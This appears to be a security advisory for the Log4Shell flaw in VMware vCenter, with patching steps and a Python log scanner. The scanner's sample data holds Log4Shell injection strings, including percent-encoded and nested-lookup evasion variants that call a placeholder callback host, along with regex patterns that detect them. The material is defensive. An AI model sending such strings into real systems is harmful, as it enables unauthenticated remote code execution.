VMware vCenter Log4Shell RCE
Description
VMware vCenter Server is affected by the Log4Shell vulnerability (CVE-2021-44228) due to its use of a vulnerable version of the Apache Log4j library. This critical flaw allows remote attackers to execute arbitrary code without authentication by exploiting improper input validation in Log4j's logging mechanism. Attackers can trigger malicious JNDI lookups that result in remote code execution or information disclosure.
Remediation
Apply the security patches provided by VMware immediately by following these steps:
1. Review the VMware Security Advisory VMSA-2021-0028 to identify the appropriate patch for your vCenter version
2. Download the applicable security patch or updated version from the VMware Customer Connect portal
3. Create a backup or snapshot of your vCenter Server before applying updates
4. Apply the patch following VMware's documented upgrade procedures for your deployment type (vCenter Server Appliance or Windows-based)
5. Verify the patch installation by checking the vCenter version number post-update
6. Monitor system logs for any suspicious activity that may have occurred prior to patching
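For step 6, the following Python script is an added example, not code from VMware or the advisory. It scans log lines for the JNDI lookup strings described above, first percent-decoding each line and collapsing nested lookups that resolve to a literal. The log line layout, hosts and addresses in SAMPLE are constructed for illustration and are not a vCenter log format.

```python
import re
from urllib.parse import unquote

# Nested lookups that resolve to a literal: ${lower:X}, ${upper:X}, ${a:b:-X}
NESTED = re.compile(r"\$\{(?:(?:lower|upper):|[^${}]*?:-)([^${}]*)\}", re.I)
# A JNDI lookup after normalisation; captures the scheme and remote host[:port]
JNDI = re.compile(r"\$\{jndi:(\w+):/+([^/}\s]+)", re.I)


def normalise(line, max_rounds=5):
    """Percent-decode and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = NESTED.sub(lambda m: m.group(1), unquote(line))
        if new == line:
            break
        line = new
    return line


def scan(lines):
    """Return (line_number, scheme, remote_host) for each line holding a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        match = JNDI.search(normalise(raw))
        if match:
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


# Constructed sample lines (hosts under .invalid, addresses from 192.0.2.0/24)
SAMPLE = [
    '192.0.2.10 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '192.0.2.44 "GET /login HTTP/1.1" 200 '
    '"${jndi:ldap://callback.example.invalid:1389/a}"',
    '192.0.2.45 "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcallback.example.invalid%2Fa%7D '
    'HTTP/1.1" 404 "-"',
    '192.0.2.46 "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:ldap://callback.example.invalid/a}"',
]

if __name__ == "__main__":
    for number, scheme, host in scan(SAMPLE):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

A hit shows that a lookup string reached the log, not that it was executed; the extracted remote host is the value to search for in outbound connection and DNS records from the same period.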
As a temporary mitigation if immediate patching is not possible, consider implementing network-level restrictions to limit access to vCenter Server to trusted IP addresses only.